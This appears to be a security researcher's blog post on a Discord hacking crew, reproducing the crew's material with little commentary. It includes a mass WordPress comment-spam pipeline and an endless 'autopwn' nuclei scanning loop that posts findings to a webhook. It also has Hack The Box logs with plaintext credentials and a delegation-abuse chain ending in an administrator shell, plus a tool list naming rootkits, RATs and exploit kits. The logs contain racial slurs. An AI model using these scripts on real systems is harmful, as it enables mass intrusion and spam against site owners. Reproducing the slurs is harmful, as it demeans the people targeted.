Tue Aug 29 23:34:08 2023
“We have begun a difficult and uncertain journey, and none of us can see its end, but our cause remains a just one. That truth honours and sanctifies our fallen comrades who have made the ultimate sacrifice so that we might carry on the work that is ahead of us. We are gathered here today to honour their memory and their names.”
“May God stand between you and harm in all the empty places where you must walk.”
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&email=##redacted-site##%40gmail.com&url=https://##redacted-site##/&submit=Post+Comment&comment_post_ID=1&comment_parent=0&wp-comment-cookies-consent=true'),
I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt who goes there” access restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced peoplei totalling about 20 people. I ignored most of it, wasn’t really relevant since it was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:
“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”
wget -c s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt (edited)
“[11/16/2022 5:27 AM] Screen quick cheatsheet:”
screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)
“Making backlinks with ffuf”
ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: http://yoursite.com/" -d "comment=hello+world&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.com%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0" -H "User-Agent: Mozilla/5.0 (Firefox)"
Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself, they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate out of mostly Bangladesh but this group mostly spoke Portuguese it seemed.
I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.
Here is another project which seems to send a generic JSON webhook to mass targets. Takes things off HackerOne datasets and uses nuclei to attempt to exploit, so things should be acceptable targets.
/usr/bin/getallscope
#!/usr/bin/python3
import json
import requests
import random
url = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json"
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
if not "targets" in data: continue
for target in data["targets"]["in_scope"]:
if not target["asset_identifier"].startswith("*."): continue
if not target["eligible_for_bounty"] == True: continue
if not target["eligible_for_submission"] == True: continue
fullz.append(target["asset_identifier"].replace("*.", ""))
random.shuffle(fullz)
print("\n".join(fullz))
/usr/bin/getrandscope
#!/bin/bash
getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile
/usr/bin/autopwn
#!/bin/bash
rm probed;
rm foundvuln.txt;
rm tmpfile;
getrandscope;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;
/usr/bin/sendwebhook (change webhook url to yours)
#!/bin/bash
argstr=$@;
argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;
/usr/bin/pwnforever
#!/bin/bash
while true; do
autopwn;
done
“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”
nohup pwnforever &
“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”
“takes urls from stdin and prints only the ones with unique parameter names”
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
if not "://" in url: return ""
urll = url.split("://")[1]
urll = "/".join(urll.split("/")[1:])
if "?" in urll: urll = urll.split("?")[0]
return urll
def alreadyparam(url):
global urlparamlist
paramsfull = ""
urlparams = url.split("?")
if len(urlparams) > 1:
urlparams = urlparams[1]
else:
urlparams = ""
paramsfull += getpath(url)
for urlparam in urlparams.split("&"):
if not "=" in urlparam: continue
else: urlparam = urlparam.split("=")[0]
paramsfull += "{}".format(urlparam)
if not paramsfull in urlparamlist:
urlparamlist.append(paramsfull)
return 0
else:
return 1
for url in sys.stdin:
url = url.strip()
if not alreadyparam(url):
print(url)
“example:”
cat all_urls.txt | python uniqparam.py > unique_param.txt
function grabipranges() {
full = "";
var links = document.getElementsByTagName("a");
for(let i = 0; i < links.length; i++) {
if(!links[i].href) continue;
if(links[i].href.indexOf("/prefix/") == -1) continue;
if(links[i].href.indexOf("::") !== -1) continue;
full += links[i].href.split("prefix/")[1] + " ";
}
console.log(full);
}
grabipranges();
“little script to grab all ip ranges from bgp.tools”
#!/bin/bash
if [[ $# < 1 ]]; then
echo "$0 <domain>";
exit;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null; then
sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null; then
sudo apt install getallurls;
fi
if ! which nmap &>/dev/null; then
sudo apt install nmap;
fi
if ! which httprobe &>/dev/null; then
sudo apt install nmap;
fi
if ! which dirsearch &>/dev/null; then
sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
if not "://" in url: return ""
urll = url.split("://")[1]
urll = "/".join(urll.split("/")[1:])
if "?" in urll: urll = urll.split("?")[0]
return urll
def getbase(url):
schema = url.split("://")[0]
url = url.split("://")[1]
if "/" in url: url = url.split("/")[0]
fullurl = "{}://{}/".format(schema, url)
return fullurl
def alreadyparam(url):
global urlparamlist
paramsfull = ""
urlparams = url.split("?")
if len(urlparams) > 1:
urlparams = urlparams[1]
else:
urlparams = ""
paramsfull += getpath(url)+"?"
for urlparam in urlparams.split("&"):
if not "=" in urlparam: continue
else: urlparam = urlparam.split("=")[0]
paramsfull += "{}={}&".format(urlparam, sys.argv[1])
paramsfull = "&".join(paramsfull.split("&")[:-1])
if not paramsfull in urlparamlist:
urlparamlist.append(paramsfull)
print(getbase(url)+paramsfull)
return 0
else:
return 1
for url in sys.stdin:
url = url.strip()
alreadyparam(url)
“generate custom wordlist from cewl output”
cat cewld.txt | python3 wordg.py > generated.txt
import sys
words = []
for line in sys.stdin:
words.append(line.strip())
def mk(lower=False):
for word in words:
for word2 in words:
if word == word2: continue
if lower == True:
word = word.lower()
word2 = word2.lower()
print("{}{}".format(word, word2))
print("{}-{}".format(word, word2))
print("{}.{}".format(word, word2))
print("{}_{}".format(word, word2))
words = list(set(words))
print(mk())
print(mk(lower=True))
These I believe are logs of their CTF challenge successes.
Nmap scan report for 10.10.11.174
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46499/tcp): CLEAN (Timeout)
| Check 2 (port 19493/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 55678/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-10-31T19:18:57
|_ start_date: N/A
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@support.htb
|_ administrator@support.htb
SMB dc.support.htb 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB dc.support.htb 445 DC [+] support.htb\guest:
SMB dc.support.htb 445 DC [+] Enumerated shares
SMB dc.support.htb 445 DC Share Permissions Remark
SMB dc.support.htb 445 DC ----- ----------- ------
SMB dc.support.htb 445 DC ADMIN$ Remote Admin
SMB dc.support.htb 445 DC C$ Default share
SMB dc.support.htb 445 DC IPC$ READ Remote IPC
SMB dc.support.htb 445 DC NETLOGON Logon server share
SMB dc.support.htb 445 DC support-tools READ support staff tools
SMB dc.support.htb 445 DC SYSVOL Logon server share
CREDS:
ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
CREDS
support
Ironside47pleasure40Watchful
LOGIN PS
evil-winrm -i dc.support.htb -u support
REMOTE
New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"
.\Rubeus.exe hash /password:123456 /user:NIGGER$ /domain:support.htb
LOCAL
impacket-getST support.htb/NIGGER$ -spn http/dc.support.htb -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip dc.support.htb
export KRB5CCNAME=administrator.ccache
impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
ROOTT FUCCKING FINNAALLYY NIGGGGERRRR
how to get
[img of i3 for kali]
- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot
Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm
.
Apparently using the control code \x0a
as a username will be accepted by Discord (UPDATE: not true anymore), but make a blank username. This was used by a non-core member of said crew.
https://book.hacktricks.xyz/welcome/readme
https://cheatsheetseries.owasp.org/
https://github.com/danielmiessler/SecLists
https://github.com/vavkamil/awesome-bugbounty-tools
dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools its a must have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories
https://cyberchef.org/ - mess with various data formats and encodings (great tool)
https://check-host.net/ - check availability of hosts, tcp and udp ports, ping, geolocation and more
https://bgp.tools/ - bgp tools
https://bgp.he.net/ - even more bgp tools
https://dehashed.com/ - service to find passwords from breaches
https://www.whoxy.com/ - whois history, reverse whois and other whois tools
crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration
masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http
linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding
powershell-empire - c2/post exploitation framweork with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux
rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb
Google - the most powerful of them all..
doxtool.py - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files
hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
Wyd.pl - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line
Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in miliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent
x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering
pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates
Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style “1337-speak” is no longer a thing, and broken english is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface), many common influencers were common tactics. This provided for very expressive “reactive” people that were easily memeable and easy to communicate via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.
Eventually a link was posted to https://skidson.online/admin.php
which provided a ton of other DNS entries.
Description provided of features:
- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim
These are some of the more sanitized chat/meme examples: